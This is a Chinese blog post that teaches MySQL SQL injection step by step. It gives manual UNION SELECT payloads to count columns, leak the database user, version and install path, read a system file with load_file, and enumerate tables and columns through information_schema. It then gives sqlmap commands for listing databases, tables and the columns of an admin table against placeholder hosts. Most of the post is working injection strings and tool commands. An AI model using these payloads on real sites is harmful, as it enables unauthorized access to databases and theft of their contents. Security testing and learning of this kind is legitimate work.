针对mysql的sql注入漏洞测试(MySql版)

最新推荐文章于 2024-06-18 10:53:33 发布
最新推荐文章于 2024-06-18 10:53:33 发布
阅读量649 收藏
点赞数
分类专栏: sql注入漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39693164/article/details/107933282
版权

 

我们先来判断下这个表中有几个字段使用 order by(如下图),如果说页面不正常了,肯定就超过这个数了,比如我们使用6来。6报错那就表述这个字段只有5个了。

id=1 order by 6#
id=1-1 union select 1,2,3,4,5#--下面获取每个字段

我们换成user(),@@version数据库版本,database()当前使用的数据库,@@basedirmysql的安装路径,随后会返回一些敏感信息

id=1-1 union select user(),@@version,database(),@@basedir,5#

或者说把5替换成个load_file('c:\\\windows\\\min.ini')# 也是可以的

那这个表属于的这个表同级别的,那数据库里都是有什么表呢

下面我们来看下,我们需要用到到他的表名使用table_name这个字段,指定information_schema这个系统表,(上一步不是查到此表的名称xxxx这个了吗)使用当前的xxxx数据库去找表,limit 0,1第一个表,0,2第二个表......以此递增

id=1-1 union select 1,table_name,3,4,5 from information_schema.TABLES where TABLES_SCHEMA="xxxx" limit 0,3#

接下来也是可以使用这个来查询表中的字段了,什么意思呢这句,查他这个column_name字段从系统表中的city表中,数据库仍然是xxxx,limit同上

id=1-1 union select 1,column_name,3,4,5 from information_schema.columns  where table_name="city" and  table_schema="xxxx" limit 0,3#

也可以使用这个直接直接from city这个表取得字段,然后把12345换成每个查询出来的字段,那么这个表的数据就返回出来了

id=1-1 union select 1,2,3,4,5 from city#--下面获取每个字段

以上是手工注入的一种方式哈

结束!

下面稍微介绍下工具辅助注入

照常打开咱们的sqlmap输入

指定id  指定咱们的mysql数据库

sqlmap.py -u "http://xxx.xxx.xx.xx/sql.php?id=1" -p id --dbms mysql

接下来获取数据库 加个--dbs

sqlmap.py -u "http://xxx.xxx.xx.xx/sql.php?id=1" -p id --dbms mysql --dbs
sqlmap.py -u “http://xxx.xxx.x.x/sql.aspx?id=1”-p id--dbms mssql  --current -db(看当前属于哪个数据库的)

sqlmap.py -u “http://xxx.xxx.x.x/sql.aspx?id=1”-p id--dbms mssql -D msdb --tables

(想要获取这个数据库的表怎么办呢,那就-D加上数据库名称,然后--tables)

也是有admin这个数据库表的,然后就想要获取admin这个表中的数据怎么办呢

sqlmap.py -u “http://xxx.xxx.x.x/sql.aspx?id=1”-p id--dbms mssql -D msdb -T admin --columns(获取当前字段的)

到此就先写到这里,是不是整个下来挺简单的,感谢支持!

还有一篇是针对sqlserver的一篇文章,大同小异:https://blog.csdn.net/qq_39693164/article/details/107926033

欢迎交流,共同进步,一起仗剑走天涯!!!                                                            

                                                                                                                                 ---莫凉--- 

白瞳洛
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql注入攻击测试_SQL注入攻击的常见方式及测试方法
weixin_39702714的博客
01-19 391
本文主要针对SQL注入的含义、以及如何进行SQL注入和如何预防SQL注入让小伙伴有个了解。适用的人群主要是测试人员,了解如何进行SQL注入,可以帮助我们测试登录、发布等模块的SQL攻击漏洞,至于如何预防SQL注入,按理说应该是开发该了解的事情~但是作为一个棒棒的测试,搞清楚原理是不是能让我们更加透彻地理解bug的产生原因呢~好啦,话不多说,进入正题~如何理解SQL注入(攻击)?SQL注入是一种将S...
mysql5 注入漏洞
10-30
mysql5注入漏洞代码
Mysql SQL注入漏洞
weixin_34060741的博客
06-17 208
学习网址:http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html      https://www.cnblogs.com/sdya/p/4568548.html 网络安全:网络攻击技术——Broken authentication      网络攻击技术(三)——Denial Of Service      网络攻击技术(二...
Web安全基础学习:SQL注入漏洞Mysql注入
最新发布
qq_51862722的博客
06-18 942
SQL注入(SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
MySql注入漏洞
weixin_44906495的博客
04-20 1496
1、简介   1.1、SQL注入的本质   web程序代码中对于用户提交的参数未做过滤就直接放到SQL语句中执行,导致参数中的特殊字符打破了SQL语句原有逻辑,黑客可以利用该漏洞执行任意SQL语句.      1.2、什么是SQL注入   1.是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击   2.这些参数传递给后台的SQL数据库服务器加以解析并执行.      1...
mysql 漏洞排查_MySQL最新漏洞分析_MySQL
weixin_42549723的博客
02-07 1686
bitsCN.com在seclists中看到一个很惊人的thread:http://seclists.org/oss-sec/2012/q2/493MySQL爆出了一个很大的安全漏洞,几乎影响5.1至5.5的所有本。出问题的模块是登录时密码校验的部分(password.c),在知道用户名的情况下(如root),直接反复重试(平均大约256次)即可登入。不过,MySQL身份认证的时候是采用3元组,...
PHP+MYSQL 注入靶场
04-26
**PHP+MYSQL 注入靶场*...通过这个靶场,你不仅可以提升SQL注入漏洞的检测和修复技能,还能了解到PHP和MySQL在Web应用安全中的重要性。记住,安全是Web开发的关键组成部分,理解和防范SQL注入是每个Web开发者的基本功。
SQL注入经典教程(珍藏).rar
11-27
3. **MySQLSQL注入**:由于标签中提到了MySQL,所以这部分可能详述MySQL数据库中的SQL注入漏洞,包括其特有的语法和可能导致的攻击场景。 4. **PHP与SQL注入**:PHP是常见的Web开发语言,因此教程可能专门讨论PHP...
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
MySQL30W测试数据
09-17
6. **安全性**:测试数据可以用于模拟安全漏洞扫描,检查权限设置、SQL注入防护等安全措施,确保数据的安全性。 7. **数据库设计**:在30W条数据上,可以测试和调整数据库的设计,比如实体关系模型(ER图)、范式...
pangolinsdl—sql注入工具
06-20
PangolinsDL是一款强大的SQL注入检测工具,它可以帮助用户识别和利用SQL注入漏洞。该工具支持多种数据库系统,包括MySQL、Oracle、SQL Server等,能够进行深度扫描和智能分析,提供详细的漏洞报告。 2. **功能特性...
SQL注入漏洞测试
09-12
SQL注入漏洞测试入门篇
MySQL SQL 注入
小小博客爱分享
07-29 189
本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符。 SQL注入可能是目前互联网上存在的最丰富的编程缺陷。 这是未经授权的人可以访问各种关键和私人数据的漏洞SQL注入不是Web或数据库服务器中的缺陷,而是由于编程实践较差且缺乏经验而导致的。 它是从远程位置执行的最致命和最容易的攻击之一。 我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理。 以下实例中,输入的用户名必须为字母、数字及下划线的组合,且用户名长度为 8 到
漏洞-MySQL注入
山下南徒的博客
07-10 488
确定使用了MySQL PHP程序一般搭配MySQL http://dynamicfountain.com/page-products-en.php?id=29%27%20and%201=1--+True http://dynamicfountain.com/page-products-en.php?id=29%27%20and%201=1--False 由注释符判定数据库为MySQL。 引发报错信息 page.php?id=' String concatenation(字符串连接) http://dy
mysql 漏洞 安全_Mysql漏洞修复方法思路及注意事项
weixin_36467992的博客
01-18 3624
【系统环境】系统环境:RedHatEnterpriseLinuxServerrelease5.4(Tikanga)+ 5.7.16MySQLCommunityServer(GPL)【漏洞信息】漏洞信息报告,根据集团第三方软件扫描出对应数据库本的漏洞信息,可以从DVE号跟当前数据库发布本时间来判断是否为误报信息:【查看修复方法】一般mysql漏洞有对应的CVE号,在Ora...
sql注入漏洞检测方法
xiuzhentianting的博客
09-04 2963
具有参数的地址: 可以用 啊D注入工具v2.32争抢 或者 Domain4.3明小子 mssql的sysobject检测,可以加上过滤条件,比如 UNICODE(substring(xtype,1,1)) between 85 And 85 端口扫描用ScanPort1.2
mysql注入漏洞_WEB 安全学习 一、mysql 注入漏洞
weixin_29009881的博客
02-08 193
转载: https://www.cnblogs.com/cui0x01/p/8620524.html一、Mysql数据库结构数据库A表名列名数据数据库B表名列名数据Mysql5.0以上自带数据库:information_schemainformation_schema:存储mysql下所有信息的数据库(数据库名,表名,列名)参数及解释database():数据库名user():数据库用户versi...
MySQL数据库渗透及漏洞利用总结
05-09 4175
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和W...
Web漏洞-mysql注入
qq_54190167的博客
03-20 866
web漏洞mysql注入
sql手工注入漏洞测试(mysql数据库)
06-28
SQL手工注入漏洞测试是一种常见的安全测试方法,主要针对MySQL数据库。通过手动输入恶意代码,测试系统是否存在SQL注入漏洞,以此来发现和修复系统的安全漏洞。这种测试方法需要有一定的技术水平和经验,同时也需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值